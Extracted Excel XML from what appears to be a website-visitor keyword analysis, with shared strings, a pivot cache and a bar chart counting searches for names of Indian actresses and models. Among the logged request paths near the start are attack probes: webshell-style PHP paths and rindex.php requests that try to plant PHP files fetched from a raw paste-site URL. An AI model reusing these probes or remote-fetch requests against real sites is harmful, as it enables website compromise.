    <t>my-account</t>
  </si>
  <si>
    <t>tag/nikita-sharma/</t>
  </si>
  <si>
    <t>view.php?name=Chandrika%20Passionica%201</t>
  </si>
  <si>
    <t>exeueatn.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>rwvdxfpl.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-admin/wso112233.php</t>
  </si>
  <si>
    <t>wp-content/plugins/ccx/</t>
  </si>
  <si>
    <t>rindex.php?action=add&amp;parameter=vrhujneyfq.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw</t>
  </si>
  <si>
    <t>rindex.php?action=add&amp;parameter=zcuqhuwwqo.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw</t>
  </si>
  <si>
    <t>rindex.php?action=add&amp;parameter=muhcxxrqha.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw</t>
  </si>
  <si>
    <t>rindex.php?action=add&amp;parameter=abfrupnloy.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw</t>
  </si>
  <si>
    <t>wp-content/xl2023.php</t>
  </si>
  <si>
    <t>wp-admin/xl2023.php</t>
  </si>
  <si>
    <t>wp-content/plugins/ioptimization/mwnvycfxjb.php?x=ooo</t>
  </si>
  <si>
    <t>blog/wp-admin/includes/</t>
  </si>
  <si>
    <t>site/wp-admin/includes/</t>
  </si>
  <si>
    <t>wordpress/wp-admin/includes/</t>
  </si>
  <si>
    <t>wp/wp-admin/includes/</t>
  </si>
  <si>
    <t>tag/%E0%B2%B8%E0%B2%82%E0%B2%A7%E0%B3%8D%E0%B2%AF%E0%B2%BE-%E0%B2%B0%E0%B2%BF%E0%B2%B6%E0%B3%8D/</t>
  </si>
  <si>
    <t>wp-content/plugins/ioptimization/vksurusxko.php?x=ooo</t>
  </si>
  <si>
    <t>wbtduqgo.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>qklacdwk.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-content/plugins/w0rdpr3ssnew/wp-login.php</t>
  </si>
  <si>
    <t>wp-content/plugins/TOPXOH/OH.php</t>
  </si>
  <si>
    <t>allgallery/Adeline%20Castelino/2.jpg</t>
  </si>
  <si>
    <t>?dumpmecheck=1</t>
  </si>
  <si>
    <t>wp-content/plugins/ioptimization/xanvbypszn.php?x=ooo</t>
  </si>
  <si>
    <t>ms-admin.php</t>
  </si>
  <si>
    <t>kannada-essay/kannada-essay-namma-kere-nammura-kere-%E0%B2%95%E0%B2%A8%E0%B3%8D%E0%B2%A8%E0%B2%A1-%E0%B2%AA%E0%B3%8D%E0%B2%B0%E0%B2%AC%E0%B2%82%E0%B2%A7-%E0%B2%A8%E0%B2%AE%E0%B3%8D%E0%B2%AE-%E0%B2%95%E0%B3%86/</t>
  </si>
  <si>
    <t>actress-anchors-models/anveshi-jain-gandi-baat-2-actress/</t>
  </si>
  <si>
    <t>wp-content/uploads/2020/06/cropped-Screenshot_20200606-143501-01-2-237x300.jpeg?v=1600437802</t>
  </si>
  <si>
    <t>wp-content/uploads/2020/08/images-1.jpeg?v=1600437765</t>
  </si>
  <si>
    <t>page/7/</t>
  </si>
  <si>
    <t>name/profiles</t>
  </si>
  <si>
    <t>tag</t>
  </si>
  <si>
    <t>categories</t>
  </si>
  <si>
    <t>Veronica%20Perasso</t>
  </si>
  <si>
    <t>sofia-ansari/</t>
  </si>
  <si>
    <t>indian-serial-actress/</t>
  </si>
  <si>
    <t>Dhivya%20Duraisamy&amp;date=2023-12-26</t>
  </si>
  <si>
    <t>Style%20With%20Plixxi</t>
  </si>
  <si>
    <t>Vaibhavi%20Joshi%20777&amp;date=2023-11-05</t>
  </si>
  <si>
    <t>Aditi%20Mistry%202607&amp;date=2023-05-16</t>
  </si>
  <si>
    <t>Neha%20Saha&amp;date=2023-09-16</t>
  </si>
  <si>
    <t>Rimpi%2031&amp;date=2023-11-05</t>
  </si>
  <si>
    <t>body-positivity/</t>
  </si>
  <si>
    <t>Ruhi%20Singh%2012</t>
  </si>
  <si>
    <t>Sureet%20Kular</t>
  </si>
  <si>
    <t>Malavika%20Mohanan&amp;date=2023-11-14</t>
  </si>
  <si>
    <t>Eva%20Lovia</t>
  </si>
  <si>
    <t>Bhumi%20Pednekar%20&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>sruthy-renjith-vaiga/</t>
  </si>
  <si>
    <t>Samyuktha%20Menon</t>
  </si>
  <si>
    <t>stylewithplixxi/</t>
  </si>
  <si>
    <t>lakshmi-rai/</t>
  </si>
  <si>
    <t>ashlesha-savant/</t>
  </si>
  <si>
    <t>prajakta/</t>
  </si>
  <si>
    <t>roma-varadkar/</t>
  </si>
  <si>
    <t>kannada-serial-actress/</t>
  </si>
  <si>
    <t>swetha-changappa/</t>
  </si>
  <si>
    <t>style-with-plixxi/</t>
  </si>
  <si>
    <t>chandini-tamilarasan/</t>
  </si>
  <si>
    <t>inaya-sultana/</t>
  </si>
  <si>
    <t>wamiqa-gabbi/</t>
  </si>
  <si>
    <t>madhuri-braganza/</t>
  </si>
  <si>
    <t>1920-bollywood-movie/</t>
  </si>
  <si>
    <t>mukesh-gahlot/</t>
  </si>
  <si>
    <t>mukhota-dance/</t>
  </si>
  <si>
    <t>anasuya-bharadwaj/</t>
  </si>
  <si>
    <t>rashi-modi/</t>
  </si>
  <si>
    <t>bigg-boss-8-kannada/</t>
  </si>
  <si>
    <t>sucheta-dutta/</t>
  </si>
  <si>
    <t>Shubha%20Poonja</t>
  </si>
  <si>
    <t>ulidavaru-kandante/</t>
  </si>
  <si>
    <t>rakulpreet-singh/</t>
  </si>
  <si>
    <t>vainidhi-jagdish/</t>
  </si>
  <si>
    <t>hindi-serial-actress/</t>
  </si>
  <si>
    <t>Antra&amp;date=2023-11-29</t>
  </si>
  <si>
    <t>Ushasi&amp;date=2024-07-24</t>
  </si>
  <si>
    <t>updates/</t>
  </si>
  <si>
    <t>Suriya+Praba</t>
  </si>
  <si>
    <t>Dounia&amp;date=2024-06-05</t>
  </si>
  <si>
    <t>%E0%B2%95%E0%B3%8D%E0%B2%AF%E0%B2%BE%E0%B2%82%E0%B2%A1%E0%B2%BF%E0%B2%B8%E0%B3%8D-%E0%B2%B9%E0%B2%AB%E0%B3%80%E0%B2%A8%E0%B3%8D/</t>
  </si>
  <si>
    <t>Ridhi%20Dogra&amp;date=2023-12-22</t>
  </si>
  <si>
    <t>Jennifer%20Marie%20Model&amp;date=2023-11-30</t>
  </si>
  <si>
    <t>Surekha%20Vani</t>
  </si>
  <si>
    <t>Khushi%20Mukherjee</t>
  </si>
  <si>
    <t>ova.html&amp;a=vx000&amp;dstr=@Ovatools</t>
  </si>
  <si>
    <t>Malvika%20Sharma&amp;date=2023-03-15</t>
  </si>
  <si>
    <t>Sruthi%20Hariharan</t>
  </si>
  <si>
    <t>Sunayana%20Fozdar</t>
  </si>
  <si>
    <t>leonilla-shwetha-dsouza/</t>
  </si>
  <si>
    <t>Neha%20Saha</t>
  </si>
  <si>
    <t>stylewithplixxi-real-name/</t>
  </si>
  <si>
    <t>Kajal%20Agarwal</t>
  </si>
  <si>
    <t>Scarlett%20M%20Rose</t>
  </si>
  <si>
    <t>Gayathiri%20Iyer</t>
  </si>
  <si>
    <t>Monalisa</t>
  </si>
  <si>
    <t>Trisha%20Krishnan&amp;date=2023-12-01</t>
  </si>
  <si>
    <t>Monami%20Ghosh</t>
  </si>
  <si>
    <t>Swagatha%20S%20Krishnan</t>
  </si>
  <si>
    <t>Sanjeeda%20Shaikh&amp;date=2023-11-04</t>
  </si>
  <si>
    <t>Hitesha%20Chandranee</t>
  </si>
  <si>
    <t>Katie%20Rose&amp;date=2023-11-15</t>
  </si>
  <si>
    <t>Sruthy%20Sithara</t>
  </si>
  <si>
    <t>Shivaleeka%20Oberoi&amp;date=2023-11-15</t>
  </si>
  <si>
    <t>splitsvilla/</t>
  </si>
  <si>
    <t>Priyanka%20Kumar&amp;date=2023-05-21</t>
  </si>
  <si>
    <t>Rambha%20Ranjith%20Kallingal</t>
  </si>
  <si>
    <t>Rambha%20Ranjith%20Kallingal&amp;date=2023-12-29</t>
  </si>
  <si>
    <t>Nila%20Nambiar</t>
  </si>
  <si>
    <t>Malavika%20Mohanan</t>
  </si>
  <si>
    <t>Priyanka%20Kumar</t>
  </si>
  <si>
    <t>op.php</t>
  </si>
  <si>
    <t>Bidisha%20Guha</t>
  </si>
  <si>
    <t>Asal%20Persian</t>
  </si>
  <si>
    <t>ova-tools.xml</t>
  </si>
  <si>
    <t>ovatools.php&amp;sfilecontent=&amp;supfiles=</t>
  </si>
  <si>
    <t>Sumi%20Chitra%2037</t>
  </si>
  <si>
    <t>sample-x5.xml</t>
  </si>
  <si>
    <t>tamil-serial-actress/</t>
  </si>
  <si>
    <t>Abhimanika</t>
  </si>
  <si>
    <t>Seethu</t>
  </si>
  <si>
    <t>Suvitha%20Rajendran&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>mumbai-model/</t>
  </si>
  <si>
    <t>Niveditha%20Gowda</t>
  </si>
  <si>
    <t>Samyuktha%20Menon&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>Bhumi%20Pednekar</t>
  </si>
  <si>
    <t>Suriya%20Praba</t>
  </si>
  <si>
    <t>Dimple%20Jain%201511&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>Juhi%20Kritika&amp;date=2023-04-14</t>
  </si>
  <si>
    <t>Sruthy%20Renjith%20Vaiga</t>
  </si>
  <si>
    <t>uorfi7i/</t>
  </si>
  <si>
    <t>Sreenidhi%20Swaminathan&amp;date=2023-04-14</t>
  </si>
  <si>
    <t>Nehal%20Vadoliya</t>
  </si>
  <si>
    <t>Ranjani%20Ramesh</t>
  </si>
  <si>
    <t>bigg-boss-ott/</t>
  </si>
  <si>
    <t>Thejaswini%20Sharma</t>
  </si>
  <si>
    <t>Ashwitha%204%20Real</t>
  </si>
  <si>
    <t>Dilsha%20Prasannan</t>
  </si>
  <si>
    <t>kadambari/</t>
  </si>
  <si>
    <t>Donal%20Bisht</t>
  </si>
  <si>
    <t>Sophie%20Dee</t>
  </si>
  <si>
    <t>Carlotta%20Champagne</t>
  </si>
  <si>
    <t>Malavika%20Mohanan&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>nibedita-paal/</t>
  </si>
  <si>
    <t>mimi-bhattacharjee/</t>
  </si>
  <si>
    <t>Dimple%20Hayathi&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>Bhanusri%20Mehra</t>
  </si>
  <si>
    <t>nikita-sharma/</t>
  </si>
  <si>
    <t>Chandrika%20Passionica%201</t>
  </si>
  <si>
    <t>%E0%B2%B8%E0%B2%82%E0%B2%A7%E0%B3%8D%E0%B2%AF%E0%B2%BE-%E0%B2%B0%E0%B2%BF%E0%B2%B6%E0%B3%8D/</t>
  </si>
  <si>
    <t>Veronica Perasso</t>
  </si>
  <si>
    <t>Dhivya Duraisamy&amp;date=2023-12-26</t>
  </si>
  <si>
    <t>Style With Plixxi</t>
  </si>
  <si>
    <t>Vaibhavi Joshi 777&amp;date=2023-11-05</t>
  </si>
  <si>
    <t>Aditi Mistry 2607&amp;date=2023-05-16</t>
  </si>
  <si>
    <t>Neha Saha&amp;date=2023-09-16</t>
  </si>
  <si>
    <t>Rimpi 31&amp;date=2023-11-05</t>
  </si>
  <si>
    <t>Ruhi Singh 12</t>
  </si>
  <si>
    <t>Sureet Kular</t>
  </si>
  <si>
    <t>Malavika Mohanan&amp;date=2023-11-14</t>
  </si>
  <si>
    <t>Eva Lovia</t>
  </si>
  <si>
    <t>Bhumi Pednekar &amp;date=2023-04-15</t>
  </si>
  <si>
    <t>Samyuktha Menon</t>
  </si>
  <si>
    <t>Shubha Poonja</t>
  </si>
  <si>
    <t>Ridhi Dogra&amp;date=2023-12-22</t>
  </si>
  <si>
    <t>Jennifer Marie Model&amp;date=2023-11-30</t>
  </si>
  <si>
    <t>Surekha Vani</t>
  </si>
  <si>
    <t>Khushi Mukherjee</t>
  </si>
  <si>
    <t>Malvika Sharma&amp;date=2023-03-15</t>
  </si>
  <si>
    <t>Sruthi Hariharan</t>
  </si>
  <si>
    <t>Sunayana Fozdar</t>
  </si>
  <si>
    <t>Neha Saha</t>
  </si>
  <si>
    <t>Kajal Agarwal</t>
  </si>
  <si>
    <t>Scarlett M Rose</t>
  </si>
  <si>
    <t>Gayathiri Iyer</t>
  </si>
  <si>
    <t>Trisha Krishnan&amp;date=2023-12-01</t>
  </si>
  <si>
    <t>Monami Ghosh</t>
  </si>
  <si>
    <t>Swagatha S Krishnan</t>
  </si>
  <si>
    <t>Sanjeeda Shaikh&amp;date=2023-11-04</t>
  </si>
  <si>
    <t>Hitesha Chandranee</t>
  </si>
  <si>
    <t>Katie Rose&amp;date=2023-11-15</t>
  </si>
  <si>
    <t>Sruthy Sithara</t>
  </si>
  <si>
    <t>Shivaleeka Oberoi&amp;date=2023-11-15</t>
  </si>
  <si>
    <t>Priyanka Kumar&amp;date=2023-05-21</t>
  </si>
  <si>
    <t>Rambha Ranjith Kallingal</t>
  </si>
  <si>
    <t>Rambha Ranjith Kallingal&amp;date=2023-12-29</t>
  </si>
  <si>
    <t>Nila Nambiar</t>
  </si>
  <si>
    <t>Malavika Mohanan</t>
  </si>
  <si>
    <t>Priyanka Kumar</t>
  </si>
  <si>
    <t>Bidisha Guha</t>
  </si>
  <si>
    <t>Asal Persian</t>
  </si>
  <si>
    <t>Sumi Chitra 37</t>
  </si>
  <si>
    <t>Suvitha Rajendran&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>Niveditha Gowda</t>
  </si>
  <si>
    <t>Samyuktha Menon&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>Bhumi Pednekar</t>
  </si>
  <si>
    <t>Suriya Praba</t>
  </si>
  <si>
    <t>Dimple Jain 1511&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>Juhi Kritika&amp;date=2023-04-14</t>
  </si>
  <si>
    <t>Sruthy Renjith Vaiga</t>
  </si>
  <si>
    <t>Sreenidhi Swaminathan&amp;date=2023-04-14</t>
  </si>
  <si>
    <t>Nehal Vadoliya</t>
  </si>
  <si>
    <t>Ranjani Ramesh</t>
  </si>
  <si>
    <t>Thejaswini Sharma</t>
  </si>
  <si>
    <t>Ashwitha 4 Real</t>
  </si>
  <si>
    <t>Dilsha Prasannan</t>
  </si>
  <si>
    <t>Donal Bisht</t>
  </si>
  <si>
    <t>Sophie Dee</t>
  </si>
  <si>
    <t>Carlotta Champagne</t>
  </si>
  <si>
    <t>Malavika Mohanan&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>Dimple Hayathi&amp;date=2023-04-15</t>
  </si>
  <si>
    <t>Bhanusri Mehra</t>
  </si>
  <si>
    <t>Chandrika Passionica 1</t>
  </si>
  <si>
    <t>sofia-ansari</t>
  </si>
  <si>
    <t>indian-serial-actress</t>
  </si>
  <si>
    <t>body-positivity</t>
  </si>
  <si>
    <t>sruthy-renjith-vaiga</t>
  </si>
  <si>
    <t>stylewithplixxi</t>
  </si>
  <si>
    <t>lakshmi-rai</t>
  </si>
  <si>
    <t>ashlesha-savant</t>
  </si>
  <si>
    <t>prajakta</t>
  </si>
  <si>
    <t>roma-varadkar</t>
  </si>
  <si>
    <t>kannada-serial-actress</t>
  </si>
  <si>
    <t>swetha-changappa</t>
  </si>
  <si>
    <t>style-with-plixxi</t>
  </si>
  <si>
    <t>chandini-tamilarasan</t>
  </si>
  <si>
    <t>inaya-sultana</t>
  </si>
  <si>
    <t>wamiqa-gabbi</t>
  </si>
  <si>
    <t>madhuri-braganza</t>
  </si>
  <si>
    <t>1920-bollywood-movie</t>
  </si>
  <si>
    <t>mukesh-gahlot</t>
  </si>
  <si>
    <t>mukhota-dance</t>
  </si>
  <si>
    <t>anasuya-bharadwaj</t>
  </si>
  <si>
    <t>rashi-modi</t>
  </si>
  <si>
    <t>bigg-boss-8-kannada</t>
  </si>
  <si>
    <t>sucheta-dutta</t>
  </si>
  <si>
    <t>ulidavaru-kandante</t>
  </si>
  <si>
    <t>rakulpreet-singh</t>
  </si>
  <si>
    <t>vainidhi-jagdish</t>
  </si>
  <si>
    <t>hindi-serial-actress</t>
  </si>
  <si>
    <t>updates</t>
  </si>
  <si>
    <t>%E0%B2%95%E0%B3%8D%E0%B2%AF%E0%B2%BE%E0%B2%82%E0%B2%A1%E0%B2%BF%E0%B2%B8%E0%B3%8D-%E0%B2%B9%E0%B2%AB%E0%B3%80%E0%B2%A8%E0%B3%8D</t>
  </si>
  <si>
    <t>leonilla-shwetha-dsouza</t>
  </si>
  <si>
    <t>stylewithplixxi-real-name</t>
  </si>
  <si>
    <t>splitsvilla</t>
  </si>
  <si>
    <t>tamil-serial-actress</t>
  </si>
  <si>
    <t>mumbai-model</t>
  </si>
  <si>
    <t>uorfi7i</t>
  </si>
  <si>
    <t>bigg-boss-ott</t>
  </si>
  <si>
    <t>kadambari</t>
  </si>
  <si>
    <t>nibedita-paal</t>
  </si>
  <si>
    <t>mimi-bhattacharjee</t>
  </si>
  <si>
    <t>nikita-sharma</t>
  </si>
  <si>
    <t>%E0%B2%B8%E0%B2%82%E0%B2%A7%E0%B3%8D%E0%B2%AF%E0%B2%BE-%E0%B2%B0%E0%B2%BF%E0%B2%B6%E0%B3%8D</t>
  </si>
  <si>
    <t>veronica perasso</t>
  </si>
  <si>
    <t>dhivya duraisamy</t>
  </si>
  <si>
    <t>style with plixxi</t>
  </si>
  <si>
    <t>vaibhavi joshi 777</t>
  </si>
  <si>
    <t>aditi mistry 2607</t>
  </si>
  <si>
    <t>neha saha</t>
  </si>
  <si>
    <t>rimpi 31</t>
  </si>
  <si>
    <t>ruhi singh 12</t>
  </si>
  <si>
    <t>sureet kular</t>
  </si>
  <si>
    <t>malavika mohanan</t>
  </si>
  <si>
    <t>eva lovia</t>
  </si>
  <si>
    <t>samyuktha menon</t>
  </si>
  <si>
    <t>shubha poonja</t>
  </si>
  <si>
    <t>antra</t>
  </si>
  <si>
    <t>ushasi</t>
  </si>
  <si>
    <t>dounia</t>
  </si>
  <si>
    <t>ridhi dogra</t>
  </si>
  <si>
    <t>jennifer marie model</t>
  </si>
  <si>
    <t>surekha vani</t>
  </si>
  <si>
    <t>khushi mukherjee</t>
  </si>
  <si>
    <t>malvika sharma</t>
  </si>
  <si>
    <t>sruthi hariharan</t>
  </si>
  <si>
    <t>sunayana fozdar</t>
  </si>
  <si>
    <t>kajal agarwal</t>
  </si>
  <si>
    <t>scarlett m rose</t>
  </si>
  <si>
    <t>gayathiri iyer</t>
  </si>
  <si>
    <t>monalisa</t>
  </si>
  <si>
    <t>trisha krishnan</t>
  </si>
  <si>
    <t>monami ghosh</t>
  </si>
  <si>
    <t>swagatha s krishnan</t>
  </si>
  <si>
    <t>sanjeeda shaikh</t>
  </si>
  <si>
    <t>hitesha chandranee</t>
  </si>
  <si>
    <t>katie rose</t>
  </si>
  <si>
    <t>sruthy sithara</t>
  </si>
  <si>
    <t>shivaleeka oberoi</t>
  </si>
  <si>
    <t>priyanka kumar</t>
  </si>
  <si>
    <t>rambha ranjith kallingal</t>
  </si>
  <si>
    <t>nila nambiar</t>
  </si>
  <si>
    <t>bidisha guha</t>
  </si>
  <si>
    <t>asal persian</t>
  </si>
  <si>
    <t>sumi chitra 37</t>
  </si>
  <si>
    <t>abhimanika</t>
  </si>
  <si>
    <t>seethu</t>
  </si>
  <si>
    <t>suvitha rajendran</t>
  </si>
  <si>
    <t>niveditha gowda</t>
  </si>
  <si>
    <t>bhumi pednekar</t>
  </si>
  <si>
    <t>suriya praba</t>
  </si>
  <si>
    <t>dimple jain 1511</t>
  </si>
  <si>
    <t>juhi kritika</t>
  </si>
  <si>
    <t>sruthy renjith vaiga</t>
  </si>
  <si>
    <t>sreenidhi swaminathan</t>
  </si>
  <si>
    <t>nehal vadoliya</t>
  </si>
  <si>
    <t>ranjani ramesh</t>
  </si>
  <si>
    <t>thejaswini sharma</t>
  </si>
  <si>
    <t>ashwitha 4 real</t>
  </si>
  <si>
    <t>dilsha prasannan</t>
  </si>
  <si>
    <t>donal bisht</t>
  </si>
  <si>
    <t>sophie dee</t>
  </si>
  <si>
    <t>carlotta champagne</t>
  </si>
  <si>
    <t>dimple hayathi</t>
  </si>
  <si>
    <t>bhanusri mehra</t>
  </si>
  <si>
    <t>chandrika passionica 1</t>
  </si>
  <si>
    <t>sofia ansari</t>
  </si>
  <si>
    <t>indian serial actress</t>
  </si>
  <si>
    <t>body positivity</t>
  </si>
  <si>
    <t>lakshmi rai</t>
  </si>
  <si>
    <t>ashlesha savant</t>
  </si>
  <si>
    <t>roma varadkar</t>
  </si>
  <si>
    <t>kannada serial actress</t>
  </si>
  <si>
    <t>swetha changappa</t>
  </si>
  <si>
    <t>chandini tamilarasan</t>
  </si>
  <si>
    <t>inaya sultana</t>
  </si>
  <si>
    <t>wamiqa gabbi</t>
  </si>
  <si>
    <t>madhuri braganza</t>
  </si>
  <si>
    <t>1920 bollywood movie</t>
  </si>
  <si>
    <t>mukesh gahlot</t>
  </si>
  <si>
    <t>mukhota dance</t>
  </si>
  <si>
    <t>anasuya bharadwaj</t>
  </si>
  <si>
    <t>rashi modi</t>
  </si>
  <si>
    <t>bigg boss 8 kannada</t>
  </si>
  <si>
    <t>sucheta dutta</t>
  </si>
  <si>
    <t>ulidavaru kandante</t>
  </si>
  <si>
    <t>rakulpreet singh</t>
  </si>
  <si>
    <t>vainidhi jagdish</t>
  </si>
  <si>
    <t>hindi serial actress</t>
  </si>
  <si>
    <t>%e0%b2%95%e0%b3%8d%e0%b2%af%e0%b2%be%e0%b2%82%e0%b2%a1%e0%b2%bf%e0%b2%b8%e0%b3%8d %e0%b2%b9%e0%b2%ab%e0%b3%80%e0%b2%a8%e0%b3%8d</t>
  </si>
  <si>
    <t>leonilla shwetha dsouza</t>
  </si>
  <si>
    <t>stylewithplixxi real name</t>
  </si>
  <si>
    <t>tamil serial actress</t>
  </si>
  <si>
    <t>mumbai model</t>
  </si>
  <si>
    <t>bigg boss ott</t>
  </si>
  <si>
    <t>nibedita paal</t>
  </si>
  <si>
    <t>mimi bhattacharjee</t>
  </si>
  <si>
    <t>nikita sharma</t>
  </si>
  <si>
    <t>%e0%b2%b8%e0%b2%82%e0%b2%a7%e0%b3%8d%e0%b2%af%e0%b2%be %e0%b2%b0%e0%b2%bf%e0%b2%b6%e0%b3%8d</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>KW_FINAL</t>
  </si>
  <si>
    <t>Count of KW_FINAL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1" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="2" xfId="0" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder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itors_Indirect_3.xlsx]Final Result_Task1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earch Keywords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" baseline="0"/>
              <a:t> from Website Visito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l Result_Task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al Result_Task1'!$A$4:$A$43</c:f>
              <c:strCache>
                <c:ptCount val="39"/>
                <c:pt idx="0">
                  <c:v>rimpi 31</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>priyanka kumar</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>sumi chitra 37</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>bidisha guha</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>asal persian</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>malavika mohanan</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>eva lovia</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>dounia</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>trisha krishnan</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>suriya praba</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>sruthy renjith vaiga</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>suvitha rajendran</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>samyuktha menon</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>chandini tamilarasan</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>swetha changappa</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>bhumi pednekar</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>leonilla shwetha dsouza</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>swagatha s krishnan</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>shubha poonja</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>prajakta</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>niveditha gowda</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>updates</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>neha saha</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>malvika sharma</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>inaya sultana</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>anasuya bharadwaj</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>indian serial actress</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>wamiqa gabbi</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>chandrika passionica 1</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>mumbai model</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>sreenidhi swaminathan</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>1920 bollywood movie</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>madhuri braganza</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>ulidavaru kandante</c:v>
                </c:pt>
                <c:pt idx="34">
                  <c:v>style with plixxi</c:v>
                </c:pt>
                <c:pt idx="35">
                  <c:v>ushasi</c:v>
                </c:pt>
                <c:pt idx="36">
                  <c:v>sucheta dutta</c:v>
                </c:pt>
                <c:pt idx="37">
                  <c:v>hitesha chandranee</c:v>
                </c:pt>
                <c:pt idx="38">
                  <c:v>ashlesha savant</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'Final Result_Task1'!$B$4:$B$43</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="39"/>
                <c:pt idx="0">
                  <c:v>23</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>21</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>13</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>8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1-41F2-9066-E717EEDD6B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388752"/>
        <c:axId val="117390672"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="117388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Keywor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90672"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1173906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times search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8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0700</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>82550</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>8401050</xdr:colOff>
      <xdr:row>21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25BC21-D53A-D5E8-F5A4-8DAF6DE5EC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esh sandesh" refreshedDate="45732.896413888891" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="304" xr:uid="{82DDEBFB-A405-4649-919A-15CEC1946D70}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table3"/>
  </cacheSource>
  <cacheFields count="4">
    <cacheField name="Column1" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="Column2" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="Column3" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="KW_FINAL" numFmtId="0">
      <sharedItems count="101">
        <s v="veronica perasso"/>
        <s v="sofia ansari"/>
        <s v="indian serial actress"/>
        <s v="dhivya duraisamy"/>
        <s v="style with plixxi"/>
        <s v="vaibhavi joshi 777"/>
        <s v="aditi mistry 2607"/>
        <s v="neha saha"/>
        <s v="rimpi 31"/>
        <s v="body positivity"/>
        <s v="ruhi singh 12"/>
        <s v="sureet kular"/>
        <s v="malavika mohanan"/>
        <s v="eva lovia"/>
        <s v="bhumi pednekar"/>
        <s v="sruthy renjith vaiga"/>
        <s v="samyuktha menon"/>
        <s v="stylewithplixxi"/>
        <s v="lakshmi rai"/>
        <s v="ashlesha savant"/>
        <s v="prajakta"/>
        <s v="roma varadkar"/>
        <s v="kannada serial actress"/>
        <s v="swetha changappa"/>
        <s v="chandini tamilarasan"/>
        <s v="inaya sultana"/>
        <s v="wamiqa gabbi"/>
        <s v="madhuri braganza"/>
        <s v="1920 bollywood movie"/>
        <s v="mukesh gahlot"/>
        <s v="mukhota dance"/>
        <s v="anasuya bharadwaj"/>
        <s v="rashi modi"/>
